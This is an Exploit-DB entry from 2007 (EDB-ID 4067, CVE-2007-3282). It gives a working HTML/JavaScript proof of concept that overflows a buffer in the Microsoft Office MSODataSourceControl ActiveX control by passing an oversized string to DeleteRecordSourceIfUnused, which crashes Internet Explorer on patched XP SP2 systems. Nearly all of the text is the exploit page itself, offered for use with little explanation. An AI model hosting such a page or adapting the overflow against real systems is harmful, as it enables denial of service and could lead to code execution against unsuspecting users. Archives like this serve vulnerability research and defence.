Microsoft Office MSODataSourceControl COM-object BoF PoC 0day

2007-06-13T00:00:00
ID EDB-ID:4067
Type exploitdb
Reporter YAG KOHHA
Modified 2007-06-13T00:00:00

Description

Microsoft Office MSODataSourceControl COM-object BoF PoC (0day). CVE-2007-3282. Dos exploit for windows platform

                                        
                                            MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# milw0rm.com [2007-06-13]